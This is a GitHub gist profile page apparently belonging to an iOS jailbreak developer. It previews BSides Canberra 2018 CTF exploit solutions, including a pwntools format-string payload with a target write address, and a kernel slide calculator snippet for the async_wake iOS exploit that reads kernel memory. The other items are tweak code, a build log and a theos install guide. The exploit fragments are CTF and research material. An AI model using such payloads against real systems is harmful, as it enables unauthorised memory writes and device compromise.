Skip to content

Instantly share code, notes, and snippets.

Avatar

George Dan ninjaprawn

View GitHub Profile
@ninjaprawn
ninjaprawn / exp_neo_boffy.py
Created Jul 17, 2018
Solution to Neo Boffy from the BSides Canberra CTF 2018
View exp_neo_boffy.py
from pwn import *
bin_path = "./neo_boffy"
# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
context(log_level="ERROR")
# Can't send NULLs, but can send empty strings
def cmdify(str): return str.split("\x00")
@ninjaprawn
ninjaprawn / dsc_changes
Created Jun 4, 2018
Changes in the iOS 12 dsc
View dsc_changes
Added:
- /System/Library/AccessibilityBundles/AXActionSheetUIServer.axuiservice/AXActionSheetUIServer
- /System/Library/Frameworks/AuthenticationServices.framework/AuthenticationServices
- /System/Library/Frameworks/CarPlay.framework/CarPlay
- /System/Library/Frameworks/CoreServices.framework/CoreServices
- /System/Library/Frameworks/CoreTelephony.framework/Support/libSystemDetermination.dylib
- /System/Library/Frameworks/GLKit.framework/GLKit
- /System/Library/Frameworks/IdentityLookupUI.framework/IdentityLookupUI
- /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSRayIntersector.framework/MPSRayIntersector
- /System/Library/Frameworks/NaturalLanguage.framework/NaturalLanguage
@ninjaprawn
ninjaprawn / exp_fat_morphine.py
Created May 31, 2018
Solution to Fat Morphine from the BSides Canberra CTF 2018
View exp_fat_morphine.py
from pwn import *
bin_path = "./fat_morphine"
payload = ""
payload += "%4196134x" # What we are writing
payload += "%{}$lln" # How we write it
payload += "\x30\x0d\x60" # Where we write it
payload = payload.format(10)
@ninjaprawn
ninjaprawn / slide.c
Last active Dec 12, 2017
async_wake_ios slide calculator - based of Siguza's v0rtex method of calculating the slide
View slide.c
/*
Offsets from iOS 11.1.2 iPhone 6+
Insert the following after line 680 in async_wait.c
Mostly from Siguza's v0rtex
*/
mach_ports_register(mach_task_self(), &user_client, 1);
uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list
uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr);
View installing theos
brew install dpkg ldid
cd ~
git clone --recursive https://github.com/theos/theos.git
echo "export THEOS=~/theos" >> .bash_profile
View limitless301016.log
Showing All Messages
Build target Limitless of project Limitless with configuration Debug
PhaseScriptExecution Symlinks\ Setup /Users/ninja/Library/Developer/Xcode/DerivedData/Limitless-ffaafdspyfyrqgberifhaiobmnbg/Build/Intermediates/Limitless.build/Debug-iphoneos/Limitless.build/Script-FA25322E1DE0FB2800D4FA86.sh
cd /Volumes/Files/Developer/Limitless
export ACTION=build
export AD_HOC_CODE_SIGNING_ALLOWED=NO
export ALTERNATE_GROUP=staff
View wtf.xm
...
@property (strong, nonatomic) NSString *currentPhoneNumber;
...
-(NSMutableArray*)getHiddenNumbers {
NSArray *hiddenNumbers = [[NSUserDefaults standardUserDefaults] objectForKey:@"hiddenNumbers"];
if (hiddenNumbers == nil) {
return [[NSMutableArray alloc] init];
}
return [NSMutableArray arrayWithArray:hiddenNumbers];
@ninjaprawn
ninjaprawn / privateclassaccessability
Created Dec 24, 2015
List of private classes/functions that can be accessed magically
View privateclassaccessability
SBUIController - NO (Protected by FrontBoard)
SBIconController - NO (Protected by FrontBoard)
SBPowerDownController - YES (assertion failure in -[SBPowerDownController _screen])
SBWallpaperController - NO (Protected by FrontBoard)
SpringBoard (actual app) - YES (Not sure how to fetch, Only one UIApp can be active at one time)
@ninjaprawn
ninjaprawn / record.xm
Created Oct 24, 2015
random attempt to record screen
View record.xm
%hook BSPlatform
- (BOOL)isInternalInstall {
return YES;
}
%end
@ninjaprawn
ninjaprawn / tweak.xm
Last active Aug 10, 2016
it was greeny D:
View tweak.xm
@interface SBApplicationController
+(id)sharedInstance;
-(id)applicationWithBundleIdentifier:(id)arg1 ;
@end
@interface SBApplication
@end
@interface SBApplicationIcon : NSObject
-(id)initWithApplication:(id)arg1 ;
You can’t perform that action at this time.